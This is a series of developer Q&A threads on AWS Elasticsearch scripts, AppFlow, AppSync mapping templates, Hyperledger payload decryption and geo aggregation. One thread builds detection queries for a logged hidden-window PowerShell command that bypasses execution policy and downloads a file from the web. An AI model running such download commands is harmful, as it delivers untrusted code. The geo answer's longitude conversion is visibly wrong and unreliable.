Scripting in AWS elasticsearch - amazon-web-services

I read online about scripting in the AWS Elasticsearch service. It said that AWS ES doesn't support dynamic scripting, so I am writing aggregations using scripts stored on disk. I wrote the following query:
{
"query":{
"match_all":{}
},
"aggs":{
"inBoundRecieved":{
"scripted_metric":{
"init_script":{
"file": "init.groovy"
},
"map_script": {
"file": "map.groovy"
},
"combine_script": {
"file":"comb.groovy"
},
"params":{
"field":"call_direction"
},
"reduce_script": {
"file": "red.groovy"
}
}
}
}
}
But I keep getting this error.
Parse Failure [Unknown key for a START_OBJECT in [inBoundRecieved]: [init_script]
I have searched a lot online but couldn't find a good solution.
Full Error ->
{
"error" : "SearchPhaseExecutionException[Failed to execute phase [query], all shards failed; shardFailures {[M-Sp4ZKmQCW0C4Ph2FIA1Q][plivoredshift][0]: RemoteTransportException[[Merlin][inet[/x.x.x.x:y]][indices:data/read/search[phase/query]]]; nested: SearchParseException[[plivoredshift][0]: query[ConstantScore(*:*)], from[-1],size[-1]: Parse Failure [Failed to parse source [{ \"query\":{ \"match_all\":{} }, \"aggs\":{ \"inBoundRecieved\":{ \"scripted_metric\":{ \"init_script\":{ \"file\": \"init.groovy\" }, \"map_script\": { \"file\": \"map.groovy\" }, \"combine_script\": { \"file\":\"comb.groovy\" }, \"params\": { \"field\":\"call_direction\" }, \"reduce_script\": { \"file\": \"red.groovy\" } } } }}]]]; nested: SearchParseException[[plivoredshift][0]: query[ConstantScore(*:*)],from[-1],size[-1]: Parse Failure [Unknown key for a START_OBJECT in [inBoundRecieved]: [init_script].]]; }{[M-Sp4ZKmQCW0C4Ph2FIA1Q][plivoredshift][1]: RemoteTransportException[[Merlin][inet[/x.x.x.x:y]][indices:data/read/ search[phase/query]]]; nested: SearchParseException[[plivoredshift][1]: query[ConstantScore(*:*)],from[-1],size[-1]: Parse Failure [Failed to parse source [{ \"query\":{ \"match_all\":{} }, \"aggs\":{ \"inBoundRecieved\":{ \"scripted_metric\":{ \"init_script\":{ \"file\": \"init.groovy\" }, \"map_script\": { \"file\": \"map.groovy\" }, \"combine_script\": { \"file\":\"comb.groovy\" }, \"params\":{ \"field\": \"call_direction\" }, \"reduce_script\": { \"file\": \"red.groovy\" } } } }}]]]; nested: SearchParseException[[plivoredshift][1]: query[ConstantScore(*:*)],from[-1],size[-1]: Parse Failure [Unknown key for a START_OBJECT in [inBoundRecieved]: [init_script].]]; }{[M-Sp4ZKmQCW0C4Ph2FIA1Q][plivoredshift][2]: RemoteTransportException[[Merlin][inet[/x.x.x.x:y]][indices:data/read/search[phase/query]]]; nested: SearchParseException[[plivoredshift][2]: query[ConstantScore(*:*)],from[-1],size[-1]: Parse Failure [Failed to parse source [{ \"query\":{ \"match_all\":{} }, 
\"aggs\":{ \"inBoundRecieved\":{ \"scripted_metric\":{ \"init_script\":{ \"file\": \"init. groovy\" }, \"map_script\": { \"file\": \"map.groovy\" }, \"combine_script\": { \"file\":\"comb.groovy\" }, \"params\":{ \"field\":\"call_direction\" }, \"reduce_script\": { \"file\": \"red.groovy\" } } } }}]]]; nested: SearchParseException[[plivoredshift][2]: query[ConstantScore(*:*)],from[-1],size[-1]: Parse Failure [Unknown key for a START_OBJECT in [inBoundRecieved]: [init_script]. ]]; }{[M-Sp4ZKmQCW0C4Ph2FIA1Q][plivoredshift][3]: RemoteTransportException[[Merlin][inet[/x.x.x.x:y]][indices:data/read/search[phase/query]]]; nested: SearchParseException[[plivoredshift][3]: query[ConstantScore(*:*)],from[-1],size[-1]: Parse Failure [Failed to parse source [{ \"query\":{ \"match_all\":{} }, \"aggs\":{ \"inBoundRecieved\":{ \"scripted_metric\":{ \"init_script\":{ \"file\": \"init. groovy\" }, \"map_script\": { \"file\": \"map.groovy\" }, \"combine_script\": { \"file\":\"comb.groovy\" }, \"params\":{ \"field\":\"call_direction\" }, \"reduce_script\": { \"file\": \"red.groovy\" } } } }}]]]; nested: SearchParseException[[plivoredshift][3]: query[ConstantScore(*:*)],from[-1],size[-1]: Parse Failure [Unknown key for a START_OBJECT in [inBoundRecieved]: [init_script].
"status":400
}
Here are my scripts
init.groovy
_agg['transactions'] = []
map.groovy
if (doc['call_direction'].value == "inbound") {_agg.transactions.add(1)} else {_agg.transactions.add(0)}
comb.groovy
inBoundRecieved=0; for( t in _agg.transactions) {inBoundRecieved+=t}; return inBoundRecieved
red.groovy
inBoundRecieved=0; for( a in _aggs) {inBoundRecieved += a}; return inBoundRecieved
I have been following this tutorial from the Elasticsearch website.
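To make the intent of the four scripts easier to check independently of the request syntax, here is a minimal plain-Python walk-through of the init/map/combine/reduce phases. It is only a sketch: the function names and the sample shard contents are made up for illustration, and it does not talk to Elasticsearch at all.

```python
# Plain-Python walk-through of the four scripted_metric phases.
# The shard contents below are made-up sample data.

def init_script():
    # init.groovy: one state object per shard
    return {"transactions": []}

def map_script(agg, doc):
    # map.groovy: record 1 for inbound calls, 0 otherwise
    agg["transactions"].append(1 if doc["call_direction"] == "inbound" else 0)

def combine_script(agg):
    # comb.groovy: per-shard subtotal
    return sum(agg["transactions"])

def reduce_script(aggs):
    # red.groovy: total across all shard subtotals
    return sum(aggs)

def scripted_metric(shards):
    partials = []
    for docs in shards:
        agg = init_script()
        for doc in docs:
            map_script(agg, doc)
        partials.append(combine_script(agg))
    return reduce_script(partials)

shards = [
    [{"call_direction": "inbound"}, {"call_direction": "outbound"}],
    [{"call_direction": "inbound"}, {"call_direction": "inbound"}],
]
print(scripted_metric(shards))  # 3
```

If the walk-through gives the expected count, the remaining problem is in how the request references the scripts, not in the counting logic itself.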

It looks like scripting can now be used in the AWS Elasticsearch service as of version 5:
http://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/aes-supported-resources.html
https://forums.aws.amazon.com/thread.jspa?threadID=217896&start=25&tstart=0


Appflow upsert error : ID does not exist in the destination connector

I am creating an AppFlow flow from an S3 bucket to Salesforce through CDK with the upsert option.
It uses an existing connection from S3 to Salesforce:
new appflow.CfnConnectorProfile(this, 'Connector',{
"connectionMode": "Public",
"connectorProfileName":"connection_name",
"connectorType":"Salesforce"
})
Destination flow Code -
new appflow.CfnFlow(this, 'Flow', {
destinationFlowConfigList: [
{
"connectorProfileName": "connection_name",
"connectorType": "Salesforce",
"destinationConnectorProperties": {
"salesforce": {
"errorHandlingConfig": {
"bucketName": "bucket-name",
"bucketPrefix": "subfolder",
},
"idFieldNames": [
"ID"
],
"object": "object_name",
"writeOperationType": "UPSERT"
}
}
}
],
..... other props ....
}
tasks: [
{
"taskType":"Filter",
"sourceFields": [
"ID",
"Some other fields",
...
],
"connectorOperator": {
"salesforce": "PROJECTION"
}
},
{
"taskType":"Map",
"sourceFields": [
"ID"
],
"taskProperties": [
{
"key":"SOURCE_DATA_TYPE",
"value":"Text"
},
{
"key":"DESTINATION_DATA_TYPE",
"value":"Text"
}
],
"destinationField": "ID",
"connectorOperator": {
"salesforce":"PROJECTION"
}
},
{
.... some other mapping fields.....
}
But the problem is: "Invalid request provided: AWS::AppFlow::FlowCreate Flow request failed: [ID does not exist in the destination connector]"
Given this error, how do I fix the problem with the existing connector that results in "ID does not exist in the destination connector"?
PS: ID is defined in the flow code, but the error still says that ID is not found.
I think your last connector operator should be:
"connectorOperator": {
"salesforce":"NO_OP"
}
instead of:
"connectorOperator": {
"salesforce":"PROJECTION"
}
since you are mapping the field ID into itself without any transformations whatsoever.
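If several fields are mapped one-to-one, the Map tasks can be generated instead of written by hand. The sketch below is only an illustration in plain Python dictionaries: map_task is a hypothetical helper (not part of CDK or AppFlow), and it simply reproduces the task shape from the question with the NO_OP operator suggested above.

```python
def map_task(field, data_type="Text"):
    """Build a one-to-one Map task (hypothetical helper, not an AWS API)."""
    return {
        "taskType": "Map",
        "sourceFields": [field],
        "taskProperties": [
            {"key": "SOURCE_DATA_TYPE", "value": data_type},
            {"key": "DESTINATION_DATA_TYPE", "value": data_type},
        ],
        "destinationField": field,
        # NO_OP: the field is copied as is, without any transformation
        "connectorOperator": {"salesforce": "NO_OP"},
    }

tasks = [map_task(name) for name in ["ID"]]
print(tasks[0]["connectorOperator"])
```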

AWS ElasticSearch Query for Keyword not getting results I expect

I have an ElasticSearch query that looks like:
{
"query": {
"constant_score": {
"filter": {
"bool": {
"should": [
{
"wildcard": {
"Message.keyword": "*System.Net.WebClient).DownloadString(*"
}
},
{
"wildcard": {
"Message.keyword": "*system.net.webclient).downloadfile(*"
}
}
]
}
}
}
}
}
And a Doc in my Index that includes:
message:Engine state is changed from None to Available. Details: NewEngineState=Available PreviousEngineState=None SequenceNumber=13 HostName=ConsoleHost HostVersion=5.1.18362.628 HostId=3dd1a50a-cc15-45e0-bf63-4456d556fb67 HostApplication=powershell.exe -command PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object System.Net.WebClient).DownloadFile('https://drive.google.com/uc?export=download EngineVersion=5.1.18362.628 RunspaceId=de762b62-056c-4be1-90bf-a12cfe6fbc72
As you can see above it includes:
(New-Object System.Net.WebClient).DownloadFile('https:....
It seems like the filter here should be matching the message, but when I execute the Query through Kibana, nothing matches even though I can see the doc above inside my index through Kibana UI if I just query for *.
I think maybe this is because the query above is querying for Message.keyword? How do I get it to successfully hit the document above?
Edit:
mapping: https://pastebin.com/cWN4jF3d
Sample data: https://pastebin.com/SyErqaG8
There are two reasons why the query does not return the result:
1. The field name in the mapping is message, whereas the query uses Message.
2. A field with the keyword datatype indexes the data as is, which means matching is case-sensitive. The document you shared contains the text System.Net.WebClient).DownloadFile( with upper-case characters, whereas the search pattern you expect to match, "*system.net.webclient).downloadfile(*", is all lower case.
Therefore the query should be:
{
"query": {
"constant_score": {
"filter": {
"bool": {
"should": [
{
"wildcard": {
"message.keyword": "*System.Net.WebClient).DownloadString(*"
}
},
{
"wildcard": {
"message.keyword": "*System.Net.WebClient).DownloadFile(*"
}
}
]
}
}
}
}
}
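The case-sensitivity point can be reproduced outside Elasticsearch. The sketch below uses Python's fnmatchcase as a stand-in for a case-sensitive wildcard match on an unanalyzed string; it is an analogy under that assumption, not the Elasticsearch implementation, and the message is shortened from the sample document.

```python
from fnmatch import fnmatchcase

# Shortened copy of the message from the sample document
message = (
    "HostApplication=powershell.exe -command "
    "(New-Object System.Net.WebClient).DownloadFile('https://drive.google.com/uc?export=download"
)

mixed_case = "*System.Net.WebClient).DownloadFile(*"
lower_case = "*system.net.webclient).downloadfile(*"

# fnmatchcase never folds case, like a wildcard on a keyword field
print(fnmatchcase(message, mixed_case))  # True
print(fnmatchcase(message, lower_case))  # False
```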
The keyword fields are used only for exact match. You will need to match the regular fields if you only want to match a substring / subset of the string, by querying on Message instead of Message.keyword:
{
"query": {
"constant_score": {
"filter": {
"bool": {
"should": [
{
"wildcard": {
"Message": "*System.Net.WebClient).DownloadString(*"
}
},
{
"wildcard": {
"Message": "*system.net.webclient).downloadfile(*"
}
}
]
}
}
}
}
}

"type mismatch error, expected type LIST" for querying a one-to-many relationship in AppSync

The schema:
type User {
id: ID!
createdCurricula: [Curriculum]
}
type Curriculum {
id: ID!
title: String!
creator: User!
}
The resolver to query all curricula of a given user:
{
"version" : "2017-02-28",
"operation" : "Query",
"query" : {
## Provide a query expression. **
"expression": "userId = :userId",
"expressionValues" : {
":userId" : {
"S" : "${context.source.id}"
}
}
},
"index": "userIdIndex",
"limit": #if(${context.arguments.limit}) ${context.arguments.limit} #else 20 #end,
"nextToken": #if(${context.arguments.nextToken}) "${context.arguments.nextToken}" #else null #end
}
The response map:
{
"items": $util.toJson($context.result.items),
"nextToken": #if(${context.result.nextToken}) "${context.result.nextToken}" #else null #end
}
The query:
query {
getUser(id: "0b6af629-6009-4f4d-a52f-67aef7b42f43") {
id
createdCurricula {
title
}
}
}
The error:
{
"data": {
"getUser": {
"id": "0b6af629-6009-4f4d-a52f-67aef7b42f43",
"createdCurricula": null
}
},
"errors": [
{
"path": [
"getUser",
"createdCurricula"
],
"locations": null,
"message": "Can't resolve value (/getUser/createdCurricula) : type mismatch error, expected type LIST"
}
]
}
The CurriculumTable has a global secondary index titled userIdIndex, which has userId as the partition key.
If I change the response map to this:
$util.toJson($context.result.items)
The output is the following:
{
"data": {
"getUser": {
"id": "0b6af629-6009-4f4d-a52f-67aef7b42f43",
"createdCurricula": null
}
},
"errors": [
{
"path": [
"getUser",
"createdCurricula"
],
"errorType": "MappingTemplate",
"locations": [
{
"line": 4,
"column": 5
}
],
"message": "Unable to convert \n{\n [{\"id\":\"87897987\",\"title\":\"Test Curriculum\",\"userId\":\"0b6af629-6009-4f4d-a52f-67aef7b42f43\"}],\n} to class java.lang.Object."
}
]
}
If I take that string and run it through a console.log in my frontend app, I get:
{
[{"id":"2","userId":"0b6af629-6009-4f4d-a52f-67aef7b42f43"},{"id":"1","userId":"0b6af629-6009-4f4d-a52f-67aef7b42f43"}]
}
That's clearly an object. How do I make it... not an object, so that AppSync properly reads it as a list?
SOLUTION
My response map had a set of curly braces around it. I'm pretty sure that was placed there in the generator by Amazon. Removing them fixed it.
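A quick way to see why the extra braces break things: a bare array is valid JSON and parses as a list, while the same array wrapped in curly braces is not valid JSON at all. The sketch below checks this with Python's json module; parses_as_list is a made-up helper name, and the items are taken from the output above.

```python
import json

def parses_as_list(text):
    """Return True only if text is valid JSON whose top level is a list."""
    try:
        return isinstance(json.loads(text), list)
    except json.JSONDecodeError:
        return False

items = [
    {"id": "2", "userId": "0b6af629-6009-4f4d-a52f-67aef7b42f43"},
    {"id": "1", "userId": "0b6af629-6009-4f4d-a52f-67aef7b42f43"},
]

bare = json.dumps(items)            # what the template should emit
wrapped = "{\n" + bare + "\n}"      # what the template emitted with the braces

print(parses_as_list(bare))     # True
print(parses_as_list(wrapped))  # False
```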
I don't think I'm seeing your complete schema; I was expecting something like:
schema {
query: Query
}
where Query is the root query type. You didn't share your Query definition, so I'll assume it is correct. The main problem is in your response template:
> "items": $util.toJson($context.result.items)
This means that you are passing a collection named "items" to the GraphQL query engine, while you refer to this collection as "createdCurricula". The response mapping template is the right place to fix this: just replace the line above with the following.
"createdCurricula": $util.toJson($context.result.items),
The main thing to note is that the mapping template is a bridge between your data sources and GraphQL. Feel free to do any computation or name mapping there, but don't forget that the object names in the response JSON must match the ones in the schema/query definition.
Thanks.
Musema
Change the result to $util.toJson($ctx.result.data.posts)
The exception msg says that it expected a type list.
Looking at:
{
[{"id":"2","userId":"0b6af629-6009-4f4d-a52f-67aef7b42f43"},{"id":"1","userId":"0b6af629-6009-4f4d-a52f-67aef7b42f43"}]
}
I don't see that createdCurricula is a LIST.
What is currently in DDB is:
"id": "0b6af629-6009-4f4d-a52f-67aef7b42f43",
"createdCurricula": null

How to decrypt an encrypted payload in hyperledger?

I am currently using Hyperledger Fabric. I am using the REST API to make a GET request like so:
curl 172.18.0.3:7050/chain/blocks/31
And the output I am getting back is :
{
"transactions": [
{
"type": 2,
"chaincodeID": "BMBQHHg2y0RnadYEaZZT8icjMvZbDPjkn5mFb+clFORxJqz8qsMs/QlalCT+A3msuc59KYM5sbZyhM3OeSplTWo91WAHTUgqIKVrm1gUzsouBIqLNvpqgimN36+s0ywF0Rx4gn27RmQYBbB+877Nh+w7A8Ezz92T1MgHcmzfRgVaDmiN0ga+jAfufNYglmeM4ZSysmSsz6xJtrcD5mTmHXZtvtw6uGCI1TCOMBaWTpLhNHfM2/5EB5jatdMjDi1GAlaXkDWcLgGjScL1yZpWcntz/N0cT90r6i9ycXZ0kk9wodBq2cFutDTdkl8S90kzd0gXig==",
"payload":"BBYZD6S/hRILcf21zVbhMAhA+qLQvAq+KvOBuXOknPCAMjas2LI9f42AKG6r+uWP71LYEkbo1XXANuDmukZjDsFGltzoIfq+Mry5n/CNXzXgiVLX0J7z08kGfEfw2vnywgmVFX4UtKPpl8pMTmRxJWn5Q0HY1pFnA6ZaXluoLRf7f17Ko4SPahi19k2NszcJ0SHE7xRllfLXZJxaOlT2J56nqjTBKTJ86bdqn6AdQXHA6Px7yz5XpgJhccyecaLS4sYcsrqHoOlO+kk+bw5Q6qnkHfIIhLXCEgHxKoT00L8I8B2luO1RlmQd4mNfXb7GrLOJXvCNPrcpSEmQDByEGwn1j3Zy0lilwKVaNYTPNThMwQ==",
"txid": "72bd2ab7-f769-49c9-a754-c7be0c481cf0",
"timestamp": {
"seconds": 1496062124,
"nanos": 474977395
},
"confidentialityLevel": 1,
"confidentialityProtocolVersion": "1.2",
"nonce": "2YgU+0WYPuTKGsKkT1hx7McOURPTIRgG",
"toValidators": "BJWJi5aSycSaJBaLIciUxlhZNyRsW6es2pO7ljUmqxP2SLzgUJtDtAeG8S5SMq+RQ9iX9m8+HIUocrD2J1MBTJaxPWcs/dYFNp1zi8k1ogbEuIQJDe/Gb0mbYVoBqGgFjofiE2lrZTO+RBVmUBQkAoybloOMUSfMawpOPTt/cIeNBq3M+t6gbTSl0ZVs5ofITWtonwhG8PNnlZwEmTLkC7evX1ImivMqo47ONxHXJlbbtjf+pL5kaqU5DrXWiv2L6Wt0xc11od4rbotnAQP2w2dqKTy2fj4ON6qCBp8i+t2FRi/iO0INJpI0aDjdkVCR",
"cert": "MIICUjCCAfigAwIBAgIRAJOBK8HG3E/Pmw8fZwL4iuswCgYIKoZIzj0EAwMwMTELMAkGA1UEBhMCVVMxFDASBgNVBAoTC0h5cGVybGVkZ2VyMQwwCgYDVQQDEwN0Y2EwHhcNMTcwNTI5MTEyNzQwWhcNMTcwODI3MTEyNzQwWjBFMQswCQYDVQQGEwJVUzEUMBIGA1UEChMLSHlwZXJsZWRnZXIxIDAeBgNVBAMTF1RyYW5zYWN0aW9uIENlcnRpZmljYXRlMFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAE6QVLJ48eCVlS1S8/BiSTU1XiWR0tZ6NGF3OZr306sTcgG/nYtcjx6/yJNwDgdYz5Boi7sA2QWUcqUkWfIPNWPKOB3DCB2TAOBgNVHQ8BAf8EBAMCB4AwDAYDVR0TAQH/BAIwADANBgNVHQ4EBgQEAQIDBDAPBgNVHSMECDAGgAQBAgMEME0GBioDBAUGBwEB/wRArYyx9l4zJL4TbxDHuGZBsJ545Jsph/D/Q/FgMTTtxPh93B+LV6AI1tyFVHWiKNS4GgvDVlmgfwFuMAca+/PaujBKBgYqAwQFBggEQPEdAS1h/9LJJmqriV+42k0bL+ghGFbHa5GiEAitiMjlduiwgfelPK/rbAq0a6NrnPXCEYe1aWCSqyqsEfHGBoIwCgYIKoZIzj0EAwMDSAAwRQIhAOidYaESZ3xyZBTgcBOm3zyXvGb4YCCt7I7+M0gZF4xzAiAgYuCf7FPGx3fnJdABlZjszA1pR6jaPtIOQN2ndfAFZA==",
"signature": "MEUCIQCVBtfjk3yzwfOFyOojH5tynq3HrG7dFN9URXB5C6kYDAIgLPcwJBAIVlD1I4dxzczfxmywlZn1ZMSvL2djioWgqFQ="
}
],
"stateHash": "9KEsiBp4t/VZyETXMASSYtuPuf8JowktCSbX7daPt69uqDzrJvifrPIXpI5N1kOayoq6H0afM8zN/WZpWsesHQ==",
"previousBlockHash": "v6Fo6SARD0xdE0B/jvIq22kgV5uLAKhTwLjrA4YRBskWcZOjECFbNgzlwFQhEmbar1zcAbcZVo9eo/3tx2y68g==",
"consensusMetadata": "CCA=",
"nonHashData": {
"localLedgerCommitTimestamp": {
"seconds": 1496062125,
"nanos": 496018341
},
"chaincodeEvents": [
{
},
{
}
]
}
}
I had performed an invoke to transfer 10 from a to b, and I got this payload.
The payload is encrypted because CORE_SECURITY_ENABLED=true and CORE_SECURITY_PRIVACY=true are set.
I know we have to use the certificate to decrypt the payload and then perhaps use base64 decoding to get the original payload back.
But my question is: what are the exact function calls or steps involved in doing so?
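For reference, the binary fields in the REST response are base64 strings, so decoding them is a separate step from decryption. The sketch below decodes two of the short fields from the block above with Python's standard library. It does not decrypt anything: for the payload field, base64 decoding would only give the ciphertext bytes.

```python
import base64

# Values copied from the block output above
nonce = base64.b64decode("2YgU+0WYPuTKGsKkT1hx7McOURPTIRgG")
consensus_metadata = base64.b64decode("CCA=")

print(len(nonce))                # 24 raw bytes
print(consensus_metadata.hex())  # 0820
```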

Using Elastic Search Geo Functionality To Find Most Common Locations?

I have a geojson file containing a list of locations each with a longitude, latitude and timestamp. Note the longitudes and latitudes are multiplied by 10000000.
{
"locations" : [ {
"timestampMs" : "1461820561530",
"latitudeE7" : -378107308,
"longitudeE7" : 1449654070,
"accuracy" : 35,
"junk_i_want_to_save_but_ignore" : [ { .. } ]
}, {
"timestampMs" : "1461820455813",
"latitudeE7" : -378107279,
"longitudeE7" : 1449673809,
"accuracy" : 33
}, {
"timestampMs" : "1461820281089",
"latitudeE7" : -378105184,
"longitudeE7" : 1449254023,
"accuracy" : 35
}, {
"timestampMs" : "1461820155814",
"latitudeE7" : -378177434,
"longitudeE7" : 1429653949,
"accuracy" : 34
}
..
Many of these locations will be the same physical location (e.g. the user's home) but obviously the longitude and latitudes may not be exactly the same.
I would like to use Elasticsearch and its geo functionality to produce a ranked list of the most common locations, where locations are deemed to be the same if they are within, say, 100m of each other.
For each common location I'd also like the list of all timestamps they were at that location if possible!
I'd very much appreciate a sample query to get me started!
Many thanks in advance.
In order to make it work you need to modify your mapping like this:
PUT /locations
{
"mappings": {
"location": {
"properties": {
"location": {
"type": "geo_point"
},
"timestampMs": {
"type": "long"
},
"accuracy": {
"type": "long"
}
}
}
}
}
Then, when you index your documents, you need to divide the latitude and longitude by 10000000, and index like this:
PUT /locations/location/1
{
"timestampMs": "1461820561530",
"location": {
"lat": -37.8103308,
"lon": 14.4967407
},
"accuracy": 35
}
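The division step can be sketched as a small conversion function. This is a minimal illustration in Python: to_geo_doc is a made-up name, the record is the first entry from the question, and the output only keeps the three fields declared in the mapping above.

```python
def to_geo_doc(record):
    """Convert one raw record (E7 integer coordinates) to a geo_point document."""
    return {
        "timestampMs": record["timestampMs"],
        "location": {
            # E7 values are degrees multiplied by 10,000,000
            "lat": record["latitudeE7"] / 1e7,
            "lon": record["longitudeE7"] / 1e7,
        },
        "accuracy": record["accuracy"],
    }

sample = {
    "timestampMs": "1461820561530",
    "latitudeE7": -378107308,
    "longitudeE7": 1449654070,
    "accuracy": 35,
}
print(to_geo_doc(sample))
```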
Finally, your search query below...
POST /locations/location/_search
{
"aggregations": {
"zoomedInView": {
"filter": {
"geo_bounding_box": {
"location": {
"top_left": "-37, 14",
"bottom_right": "-38, 15"
}
}
},
"aggregations": {
"zoom1": {
"geohash_grid": {
"field": "location",
"precision": 6
},
"aggs": {
"ts": {
"date_histogram": {
"field": "timestampMs",
"interval": "15m",
"format": "DDD yyyy-MM-dd HH:mm"
}
}
}
}
}
}
}
}
...will yield the following result:
{
"aggregations": {
"zoomedInView": {
"doc_count": 1,
"zoom1": {
"buckets": [
{
"key": "k362cu",
"doc_count": 1,
"ts": {
"buckets": [
{
"key_as_string": "Thu 2016-04-28 05:15",
"key": 1461820500000,
"doc_count": 1
}
]
}
}
]
}
}
}
}
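To see what the geohash_grid bucketing does, here is a rough client-side sketch in Python: it encodes each point with the standard geohash algorithm, groups timestamps per cell, and ranks cells by how many points they hold. The function names are made up, and the second and third sample documents are hypothetical. Note that a precision of 6 gives cells of roughly 1.2 km by 0.6 km, so a higher precision (7 is roughly 150 m) is closer to the 100m requirement.

```python
from collections import defaultdict

BASE32 = "0123456789bcdefghjkmnpqrstuvwxyz"

def geohash(lat, lon, precision=6):
    """Standard geohash: interleave longitude/latitude bisection bits."""
    lat_lo, lat_hi, lon_lo, lon_hi = -90.0, 90.0, -180.0, 180.0
    chars, bits, value, use_lon = [], 0, 0, True
    while len(chars) < precision:
        if use_lon:
            mid = (lon_lo + lon_hi) / 2
            bit = lon >= mid
            lon_lo, lon_hi = (mid, lon_hi) if bit else (lon_lo, mid)
        else:
            mid = (lat_lo + lat_hi) / 2
            bit = lat >= mid
            lat_lo, lat_hi = (mid, lat_hi) if bit else (lat_lo, mid)
        value = (value << 1) | int(bit)
        use_lon = not use_lon
        bits += 1
        if bits == 5:  # every 5 bits become one base32 character
            chars.append(BASE32[value])
            bits, value = 0, 0
    return "".join(chars)

def rank_locations(docs, precision=6):
    """Group timestamps by geohash cell, most populated cell first."""
    cells = defaultdict(list)
    for doc in docs:
        loc = doc["location"]
        cells[geohash(loc["lat"], loc["lon"], precision)].append(doc["timestampMs"])
    return sorted(cells.items(), key=lambda kv: len(kv[1]), reverse=True)

docs = [
    {"timestampMs": "1461820561530", "location": {"lat": -37.8103308, "lon": 14.4967407}},
    # The two documents below are hypothetical
    {"timestampMs": "1461820455813", "location": {"lat": -37.8103, "lon": 14.4968}},
    {"timestampMs": "1461820281089", "location": {"lat": 10.0, "lon": 10.0}},
]
for cell, timestamps in rank_locations(docs):
    print(cell, len(timestamps), timestamps)
```

The first document is the one indexed above, and it falls in the same k362cu cell that the aggregation reports.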
UPDATE
According to our discussion, here is a solution that could work for you. Using Logstash, you can call your API and retrieve the big JSON document (using the http_poller input), extract/transform all locations and sink them to Elasticsearch (with the elasticsearch output) very easily.
Here is how it goes in order to format each event as depicted in my initial answer.
Using http_poller you can retrieve the JSON locations (note that I've set the polling interval to 1 day, but you can change that to some other value, or simply run Logstash manually each time you want to retrieve the locations)
Then we split the locations array into individual events
Then we divide the latitude/longitude fields by 10,000,000 to get proper coordinates
We also need to clean it up a bit by moving and removing some fields
Finally, we just send each event to Elasticsearch
Logstash configuration locations.conf:
input {
http_poller {
urls => {
get_locations => {
method => get
url => "http://your_api.com/locations.json"
headers => {
Accept => "application/json"
}
}
}
request_timeout => 60
# interval is expressed in seconds: 86400 = 1 day
interval => 86400
codec => "json"
}
}
filter {
split {
field => "locations"
}
ruby {
code => "
event['location'] = {
'lat' => event['locations']['latitudeE7'] / 10000000.0,
'lon' => event['locations']['longitudeE7'] / 10000000.0
}
"
}
mutate {
add_field => {
"timestampMs" => "%{[locations][timestampMs]}"
"accuracy" => "%{[locations][accuracy]}"
"junk_i_want_to_save_but_ignore" => "%{[locations][junk_i_want_to_save_but_ignore]}"
}
remove_field => [
"locations", "@timestamp", "@version"
]
}
}
output {
elasticsearch {
hosts => ["localhost:9200"]
index => "locations"
document_type => "location"
}
}
You can then run with the following command:
bin/logstash -f locations.conf
When that has run, you can launch your search query and you should get what you expect.